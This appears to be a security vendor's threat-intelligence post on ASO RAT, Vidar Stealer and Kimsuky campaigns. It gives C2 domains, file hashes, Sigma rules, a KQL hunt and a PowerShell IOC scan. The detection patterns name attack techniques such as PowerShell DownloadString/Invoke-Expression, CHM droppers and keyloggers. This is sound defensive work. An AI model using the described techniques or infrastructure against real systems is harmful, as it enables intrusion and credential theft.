Back to Intelligence

ASO RAT, Vidar Stealer Loader, and Kimsuky APT Campaigns: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
May 13, 2026
6 min read

Recent OTX pulses highlight a convergence of high-fidelity threats ranging from mobile surveillance to sophisticated credential theft and state-sponsored espionage. Activity includes the deployment of ASO RAT, an Arabic-language Android surveillance tool targeting Syrian entities; a Vidar Stealer campaign utilizing AutoIt loaders and process masquerading; and Kimsuky (APT43) leveraging CHM droppers to deploy PowerShell keyloggers. Collectively, these campaigns emphasize the abuse of legitimate scripting environments (AutoIt, PowerShell, VBScript) and infrastructure misconfigurations (open directory listing) to establish persistence and exfiltrate sensitive data.

Threat Actor / Malware Profile

ASO RAT (Android Surveillance)

  • Distribution: Disguised as PDF readers or Syrian government applications via APK builder tooling.
  • Behavior: Comprehensive device compromise including SMS interception, camera/mic activation, GPS tracking, and DDoS-for-hire capabilities.
  • C2 Infrastructure: Utilizes DDNS (aso.ddns.net) resolving to Frankfurt-based infrastructure.

Vidar Stealer (Windows)

  • Distribution: Multi-stage loader starting with MicrosoftToolkit.exe.
  • Technique: Renames .dot files to .bat for execution (masquerading). Abuses AutoIt scripting.
  • Behavior: Performs process discovery, terminates security-related processes (Defense Evasion), and injects payloads for credential harvesting.
  • C2 Communication: Connects to gz.technicalprorj.xyz.

Kimsuky (APT43)

  • Distribution: Spear-phishing involving CHM files (e.g., api_reference.chm).
  • Technique: "Living off the Land" using CHM droppers to execute VBScript stagers and PowerShell keyloggers.
  • Behavior: Establishes persistence via Scheduled Tasks. The C2 server check.nid-log.com had directory listing enabled, exposing the full attack chain source code.

IOC Analysis

The provided indicators span multiple vectors requiring layered defense:

  • Network: Hostnames and Domains (e.g., aso.ddns.net, gz.technicalprorj.xyz, withheldforprivacy.com) should be blocked at the perimeter and DNS layer. These indicate active C2 infrastructure.
  • File Hashes: A mix of MD5, SHA1, and SHA256 hashes for droppers, loaders, and final payloads. SOC teams should use EDR telemetry to hunt for these specific hashes on endpoints.
  • CVEs: CVE-2023-44487 and CVE-2025-23419 are associated with the ASO RAT campaign; while the direct exploit vector isn't detailed, patching against these is critical to prevent initial access or infrastructure compromise.

Detection Engineering

YAML
title: Suspicious AutoIt Execution Leading to Vidar Stealer
id: 8c7a2d1e-9b4f-4a1c-8d5e-1f2a3b4c5d6e
description: Detects execution of AutoIt scripts often used in Vidar Stealer loaders, specifically looking for MicrosoftToolkit or process masquerading patterns.
status: experimental
date: 2026/05/13
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection_autoit:
        Image|endswith: '\AutoIt3.exe'
    selection_loader:
        CommandLine|contains:
            - 'MicrosoftToolkit.exe'
            - '.dot'
            - '.bat'
    condition: 1 of selection_*
falsepositives:
    - Legitimate administration scripts using AutoIt
level: high
tags:
    - attack.defense_evasion
    - attack.t1036
    - attack.execution
    - attack.t1059.001
---
title: Kimsuky CHM Dropper and PowerShell Keylogger Activity
id: 9d8b3e2f-0c5a-4b2d-9e6f-2a3b4c5d6e7f
description: Detects execution of Compiled HTML Help files (hh.exe) followed by PowerShell activity indicative of the Kimsuky NIDLog attack chain.
status: experimental
date: 2026/05/13
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection_chm:
        Image|endswith: '\hh.exe'
        CommandLine|contains: '.chm'
    selection_powershell:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'DownloadString'
            - 'Invoke-Expression'
    timeframe: 2m
    condition: selection_chm | by ParentProcessGuid | followed by selection_powershell
falsepositives:
    - Viewing legitimate help documentation that triggers scripts
level: critical
tags:
    - attack.initial_access
    - attack.t1566.001
    - attack.persistence
    - attack.t1053.005
---
title: ASO RAT and Kimsuky C2 Network Connections
id: 0e1f4a3b-5d6e-7f8a-9b0c-1d2e3f4a5b6c
description: Identifies network connections to known Command and Control infrastructure associated with ASO RAT and Kimsuky campaigns.
status: experimental
date: 2026/05/13
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection_c2:
        DestinationHostname|contains:
            - 'aso.ddns.net'
            - 'technicalprorj.xyz'
            - 'nid-log.com'
            - 'withheldforprivacy.com'
            - 'noreplymail.space'
    condition: selection_c2
falsepositives:
    - Unlikely, these are specific DDNS and C2 domains
level: critical
tags:
    - attack.command_and_control
    - attack.t1071.001


kql
// Hunt for Vidar and Kimsuky Indicators of Compromise
// Search for C2 domains in network events
DeviceNetworkEvents
| where RemoteUrl has_any ("aso.ddns.net", "technicalprorj.xyz", "nid-log.com", "noreplymail.space", "uncork.biz")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| extend IoC_Type = "C2_Domain"
| union (
    DeviceProcessEvents
    // Hunt for AutoIt abuse and CHM execution
    | where FileName in~ ("AutoIt3.exe", "hh.exe") 
       or ProcessCommandLine contains_any ("MicrosoftToolkit", "api_reference.chm", ".dot", ".bat")
    | project Timestamp, DeviceName, FileName, ProcessCommandLine, FolderPath
    | extend IoC_Type = "Suspicious_Process"
)
| order by Timestamp desc


powershell
# IOC Hunt Script: ASO RAT, Vidar, and Kimsuky Persistence
# Checks for file hashes, scheduled tasks, and suspicious registry keys

$MaliciousHashes = @(
    "31514358bf684a1e466a9e8069c11031",
    "b3e706ba673cfeb9d205fb97b0ac624c",
    "c3315d582e71412e830e019d036d811d",
    "7ac9278876c83c9b597fae68acb6fbf9",
    "4599ac1bbe483c73064df1353feafd01",
    "7047878f4fbea323148f6554afe616991eb56cc327653972c4213a9017c5e66b"
)

Write-Host "[+] Scanning for Scheduled Tasks associated with Kimsuky..."
$SuspiciousTasks = Get-ScheduledTask | Where-Object { 
    $_.TaskName -match "api" -or 
    $_.Actions -like "*nid-log*" -or 
    $_.Actions -like "*BitJoker*" 
}

if ($SuspiciousTasks) {
    Write-Host "[!] Potential Kimsuky Persistence Found:" -ForegroundColor Red
    $SuspiciousTasks | Select-Object TaskName, State, Author | Format-Table
} else {
    Write-Host "[-] No suspicious scheduled tasks found."
}

Write-Host "[+] Scanning for AutoIt executables (Vidar Loader)..."
$AutoItFiles = Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Filter "*.exe" | Where-Object { $_.Name -like "*AutoIt*" -or $_.Name -like "*MicrosoftToolkit*" }
if ($AutoItFiles) {
    Write-Host "[!] AutoIt or Loader executables found:" -ForegroundColor Yellow
    $AutoItFiles | Select-Object FullName, Length | Format-Table
}

Write-Host "[+] Checking file hashes against known malware IOCs..."
$Drives = Get-PSDrive -PSProvider FileSystem
foreach ($Drive in $Drives) {
    Get-ChildItem -Path $Drive.Root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        if ($_.Length -gt 0) {
            $hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
            if ($MaliciousHashes -contains $hash) {
                Write-Host "[!] MALICIOUS FILE DETECTED: $($_.FullName)" -ForegroundColor Red
            }
        }
    }
}
Write-Host "[+] Hunt complete."


# Response Priorities

*   **Immediate**:
    *   Block all listed C2 domains and hostnames (`aso.ddns.net`, `gz.technicalprorj.xyz`, `nid-log.com`) at the network edge and proxy.
    *   Initiate a hunt for the file hashes provided in the Pulse data across all endpoints.
    *   Isolate any systems showing signs of `hh.exe` spawning PowerShell or `AutoIt3.exe` execution.

*   **24 Hours**:
    *   If Vidar Stealer indicators are found, initiate forced password resets for credentials stored on affected machines and monitor for lateral movement.
    *   Review logs for connections to `withheldforprivacy.com` or `noreplymail.space`.

*   **1 Week**:
    *   Review policy on AutoIt usage within the enterprise; consider blocking or restricting `AutoIt3.exe` execution via AppLocker.
    *   Patch systems against CVE-2023-44487 and CVE-2025-23419 to mitigate potential infrastructure exploit risks.
    *   Conduct a security awareness briefing regarding CHM file phishing and suspicious APK downloads.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwarekimsukyvidar-stealeraso-ratapt43autoit-loader

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action